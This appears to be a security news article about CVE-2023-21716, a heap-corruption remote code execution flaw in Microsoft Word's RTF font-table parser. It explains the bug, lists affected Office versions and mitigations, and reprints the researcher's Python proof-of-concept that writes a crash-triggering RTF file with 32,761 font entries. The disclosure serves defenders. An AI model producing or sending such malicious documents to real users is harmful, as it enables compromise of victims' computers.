A researcher named Joshua J. Drake (@jduck) has released the details of the Microsoft Word Zero-Day vulnerability which got patched by Microsoft on February 2023 patch updates.
On the February 2023 patch update, Microsoft fixed 75 security vulnerabilities across various Microsoft products including Three zero-days, which also fixed critical RCE bugs in Microsoft Word which could easily be exploited by ransomware operators (CVE-2023-21716).
In February 2023, Microsoft addressed 75 security vulnerabilities that were present in a variety of Microsoft products. This included fixing three zero-day vulnerabilities, which were critical in nature. Among the zero-day vulnerabilities that were addressed, a critical severity remote code execution (RCE) bug that existed in Microsoft Word (CVE-2023-21716) with a CVSS Score of 9.8/10 was also got fixed. These bugs were easily exploitable by ransomware operators, making them a major concern for users.
Microsoft Word RCE (CVE-2023-21716)
The vulnerability CVE-2023-21716 within Microsoft Office's wwlib allows attackers to achieve remote code execution with the privileges of the victim that opens a malicious RTF document. The attacker could deliver this file as an email attachment (or other means).
The vulnerability lies in the RTF parser in Microsoft Word, which contains a heap corruption vulnerability when dealing with a font table (\fonttbl) containing an excessive number of fonts (\f###). When processing fonts, the font ID value (the numbers after a \f) is handled by the code that sign extends the value loaded, thus filling the upper bits of edx with ffff. When this occurs, the memory writes instruction corrupts the heap by writing the font code page to a negative offset of the memory held in esi. This out-of-bounds memory write can be exploited by attackers to execute arbitrary code with the privileges of the victim who opens the malicious RTF document.
To exploit this vulnerability, an attacker could deliver a malicious RTF file as an email attachment or through other means. When the victim opens the file, the vulnerability is triggered, and the attacker can execute arbitrary code with the same privileges as the victim, potentially allowing them to take control of the victim's computer system.
Affected Versions of MS Word
According to the researcher, this vulnerability affects at least the following versions of Microsoft Office:
- Microsoft Office 365 (Insider Preview - 2211 Build 15831.20122 CTR)
- Microsoft Office 2016 (Including Insider Slow - 1704 Build 8067.2032 CTR)
- Microsoft Office 2013
- Microsoft Office 2010
- Microsoft Office 2007
Older versions may also be affected but were not tested.
CVE-2023-21716 Python PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
— Joshua J. Drake (@jduck) March 5, 2023
(CVE-2023-21716) POC Exploit Code
{% highlight Python %} #!/usr/bin/python # # PoC for: # Microsoft Word RTF Font Table Heap Corruption Vulnerability # # by Joshua J. Drake (@jduck) # import sys # allow overriding the number of fonts num = 32761 if len(sys.argv) > 1: num = int(sys.argv[1]) f = open("tezt.rtf", "wb") f.write("{\\rtf1{\n{\\fonttbl") for i in range(num): f.write("{\\f%dA;}\n" % i) f.write("}\n") f.write("{\\rtlch it didn't crash?? no calc?! BOO!!!}\n") f.write("}}\n") f.close() {% endhighlight %}
open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
Mitigation for MS Word RCE (CVE-2023-21716)
Microsoft has released a security patch that addresses the issue with the release of the February patch update.
Users are advised to apply the patch as soon as possible to protect themselves from this vulnerability. Additionally, users are encouraged to exercise caution when opening email attachments or downloading files from the internet, particularly if they are unfamiliar with the sender or the source of the file.
Additionally, Microsoft Office 2010 and later use Protected View to limit the damage caused by malicious documents procured from untrusted sources. Protected View is in effect when this vulnerability manifests and thus an additional sandbox escape vulnerability would be required to gain full privileges.
Removing the file association for the RTF extension is ineffective because using a DOC extension will still reach the vulnerable code.